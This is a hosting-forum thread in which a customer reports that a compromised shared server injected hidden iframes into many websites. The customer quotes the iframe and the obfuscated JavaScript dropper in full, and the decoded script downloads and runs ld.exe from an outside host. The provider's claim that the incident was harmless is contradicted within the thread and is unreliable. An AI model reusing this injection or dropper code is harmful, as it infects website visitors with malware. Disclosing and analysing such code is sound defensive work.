Malware Links on Server

[DavidAllen]

I reported before Xmas (16th Dec) that the server 64.38.20.218 had been hacked and a line of code that attempted to d/load malware had been added to virtually every domain on that server.
Since then the only response I have had is an email from Andy in Tech Support saying they were passing it on to 'Senior Admin'. I have requested more information several times, but nothing.
The line of code that was added to the websites was:
iframe src="http://mortimercomprehensive.co.uk/images/opennight/thumbs/tmp1/index.php" frameborder=0 border=0 height=0 width=0 style="display: none"></iframe>
This eventually leads to a page with encrypted code that d/loads nasty malware to the users computer.
To my mind this is a serious issue.
The server has been hacked on at least 2 (probably 3) separate occasions.
EUK have partially cleaned up by replacing mortimercomprehensive.co.uk with google.co.uk on some of the websites - but several still remain with the original intact and still infecting visitors to those websites.
What is happening EUK???

[eUKhost.com]

We had tried to upgrade kernel on this server couple of times in last 3 months but evertime the upgrade failed.

Our Senior System admins as well as some other well known system admins failed to complete the upgrade. Someone managed to exploit the old kernel and ran mass injection script which added iframe code in index pages of all websites hosted on the server.

We have system admins who are experts in kernel upgrade but the typical make of this server was responsible for failure of the upgrade. We managed to successfully upgrade the kernel version on 26th Dec 2006 and now the server is safe. We've also found the website which was targetted to run this mass injection script and that account was previously terminated from the server.

We cannot give such updates to all customers hosted on respective servers and most of the customers have no knowledge of kernel or linux and such minor problems may raise questions in their minds.

We ran replace command to replace the injection with google.co.uk twice in the month of december. This injection was getting executed in IE only and it was just a image and there were no virus website links or anything harmful for visitors computer.

This should not be considered any hacking attempt or any major problem as iframe code injection is much different from root exploit or hacking.

[DavidAllen]

The code is still on several websites on that server - so the replace command needs re-running.
It doesn't just lead to 'just a image' it leads to a page with another hidden iframe which displays a page (mn.html) with the following code on it:
script language=JavaScript>eval(unescape('var%20codelock_ bas%3D%27ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno pqrstuvwxyz0123456789%2B%2F%27%3B%20function%20cod elock_dec%28str%29%20%7B%20str%3Dstr.split%28%27%4 0%27%29.join%28%27CAg%27%29%3B%20str%3Dstr.split%2 8%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dstr.sp lit%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%2 0bt%2C%20dt%20%3D%20%27%27%3B%20for%28i%3D0%3B%20i %3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%20 %3D%20%28codelock_bas.indexOf%28str.charAt%28i%29% 29%20%26%200xff%29%20%3C%3C18%20%7C%20%28codelock_ bas.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%20 0xff%29%20%3C%3C12%20%7C%20%28codelock_bas.indexOf %28str.charAt%28i%20%2B2%29%29%20%26%200xff%29%20% 3C%3C%206%20%7C%20codelock_bas.indexOf%28str.charA t%28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%2 0String.fromCharCode%28%28bt%20%26%200xff0000%29%2 0%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2 C%20bt%20%26%200xff%29%3B%20%7D%20if%28str.charCod eAt%28i%20-2%29%20%3D%3D%2061%29%20%7B%20return%28dt.substrin g%280%2C%20dt.length%20-2%29%29%3B%20%7D%20else%20if%28str.charCodeAt%28i% 20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.substrin g%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D%3B% 20%7D')); document.write(codelock_dec('PGh0bWw+DQo8aGVhZD4NC jxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsY!ndWFn ZT0iamF2YXNjcmlwdCI+DQp2YXIgaSA9IDA7DQp2YXIgdCA9IG 5ldyBBcnJheSgNCgknQkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0Et MDBDMDRGQzI5RTM2JywNCgknQUI5QkNFREQtRUM3RS00N0UxLT kzMjItRDRBMjEwNjE3MTE2JywNCgknMDAwNkYwMzMtMDAwMC0w MDAwLUMwMDAtMDAwMDAwMDAwMDQ2JywNCgknMDAwNkYwM0EtMD AwMC0wMDAwLUMwMDAtMDAwMDAwMDAwMDQ2JywNCgknNkUzMjA3 MEEtNzY2RC00RUU2LTg3OUMtREMxRkE5MUQyRkMzJywNCgknNj QxNDUxMkItQjk3OC00NTFELUEwRDgtRkNGREYzM0U4MzNDJywN CgknN0Y1QjdGNjMtRjA2Ri00MzMxLThBMjYtMzM5RTAzQzBBRT NEJywNCgknMDY3MjNFMDktRjRDMi00M2M4LTgzNTgtMDlGQ0Qx REIwNzY2JywNCgknNjM5RjcyNUYtMUIyRC00ODMxLUE5RkQtOD c0ODQ3NjgyMDEwJywNCgknQkEwMTg1OTktMURCMy00NGY5LTgz QjQtNDYxNDU0Qzg0QkY4JywNCgknRDBDMDdENTYtN0M2OS00M0 YxLUI0QTAtMjVGNUExMUZBQjE5JywNCgknRThDQ0NEREYtQ0Ey OC00OTZiLUIwNTAtNkMwN0M5NjI0NzZCJw0KKTsNCg0KZnVuY3 Rpb24gZmdyKCkgew0KCXJldHVybiB0cnVlOw0KfQ0Kd2luZG93 Lm9uZXJyb3IgPSBmZ3I7DQoNCmZ1bmN0aW9uIENyZWF0ZU8oby wgbikgew0KCXZhciByID0gbnVsbDsNCgl0cnkgeyBldmFsKCdy ID0gby5DcmVhdGVPYmplY3QobiknKSB9Y2F0Y2goZSl7fQ0KCW lmICghIHIpIHsNCgkJdHJ5IHsgZXZhbCgnciA9IG8uQ3JlYXRl T2JqZWN0KG4sICIiKScpIH1jYXRjaChlKXt9DQoJfQ0KCWlmIC ghIHIpIHsNCgkJdHJ5IHsgZXZhbCgnciA9IG8uQ3JlYXRlT2Jq ZWN0KG4sICIiLCAiIiknKSB9Y2F0Y2goZSl7fQ0KCX0NCglpZi AoISByKSB7DQoJCXRyeSB7IGV2YWwoJ3IgPSBvLkdldE9iamVj dCgiIiwgbiknKSB9Y2F0Y2goZSl7fQ0KCX0NCglpZiAoISByKS B7DQoJCXRyeSB7IGV2YWwoJ3IgPSBvLkdldE9iamVjdChuLCAi IiknKSB9Y2F0Y2goZSl7fQ0KCX0NCglpZiAoISByKSB7DQoJCX RyeSB7IGV2YWwoJ3IgPSBvLkdldE9iamVjdChuKScpIH1jYXRj aChlKXt9DQoJfQ0KCXJldHVybihyKTsJDQp9DQoNCmZ1bmN0aW 9uIERvSXQoKSANCnsgDQoJeC5PcGVuKCdHRVQnLCdodHRwOi8v bW9ydGltZXJjb21wcmVoZ!zaXZlLmNvLnVrL2ltYWdlcy9vcGV ubmlnaHQvdGh1bWJzL3RtcDEvbGQuZXhlJyxmYWxzZSk7DQoJe C5TZ!kKCk7DQoJdmFyIGZuYW1lMSA9ICdtby5jb20nOw0KCXZh ciBmID0gQ3JlYXRlTyh4bWwsJ1NjcmlwdGluZy5GaWxlU3lzdG VtT2JqZWN0Jyk7DQoJdmFyIHRtcCA9IGYuR2V0U3BlY2lhbEZv bGRlcigyKTsNCglmbmFtZTEgPSBmLkJ1aWxkUGF0aCh0bXAsZm 5hbWUxKTsNCglTLm9wZW4oKTsNCglTLndyaXRlKHgucmVzcG9u c2VCb2R5KTsNCglTLnNhdmV0b2ZpbGUoZm5hbWUxLDIpOw0KCV MuY2xvc2UoKTsNCgl2YXIgUSA9IENyZWF0ZU8oeG1sLCdTaGVs bC5BcHBsaWNhdGlvbicpOw0KCVEuU2hlbGxFeGVjdXRlKGZuYW 1lMSwnJywnJywnb3BlbicsMCk7DQp9DQoNCjwvc2NyaXB0Pg0K PC9oZWFkPg0KPGJvZHk+DQo8c2NyaXB0IHR5cGU9InRleHQvam F2YXNjcmlwdCIgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiPg0KaWYg KG5hdmlnYXRvci51c2VyQWdlbnQua!kZXhPZignTVNJRScpICE 9IC0xKSB7DQoJd2hpbGUgKHRbaV0pIHsNCg0KCQl2YXIgeG1sI D0gbnVsbDsNCg0KCQl4bWwgPSBkb2N1bWVudC5jcmVhdGVFbGV tZ!0KCdvYmplY3QnKTsNCgkJeG1sLnNldEF0dHJpYnV0ZSgnY2 xhc3NpZCcsJ2Nsc2lkOkJEOTZDNTU2LTY1QTMtMTFEMC05ODNB LTAwQzA0RkMyOUUzNicpOw0KCQluX3htbCA9ICdNaWNyb3NvZn QuWE1MSFRUUCc7DQoJCXZhciB4ID0geG1sLkNyZWF0ZU9iamVj dChuX3htbCwiIik7DQoJCWExID0gJ0FETyc7DQoJCWEyID0gJ0 RCLic7DQoJCWEzID0gJ1N0cic7DQoJCWE0ID0gJ2VhbSc7DQoJ CXN0cjEgPSBhMSArIGEyICsgYTMgKyBhNDsNCgkJc3RyNSA9IH N0cjE7DQoJCWlmICh4bWwpIHsNCgkgCQl2YXIgUyA9IENyZWF0 ZU8oeG1sLHN0cjUpOw0KCQkJaWYgKFMpIHsNCgkJCQlTLnR5cG UgPSAxOw0KCQkJCXN0cjYgPSAnR0VUJzsNCgkJCQlEb0l0KCk7 DQoJCQl9DQoJCX0NCgl9DQp9DQo8L3NjcmlwdD4NCg0KPC9ib2 R5Pg0KPC9odG1sPg==')); </script>
if you decode that lot you will find that it tries to d/load and execute a file called ld.exe which in turn d/loads further malware!!!

I appreciate you can't tell everyone on the server - but I reported the problem and was left wondering what to do - I had no information about when/if you were running your replace command so had to manually edit all the websites I control.

The code is still there on several sites!!!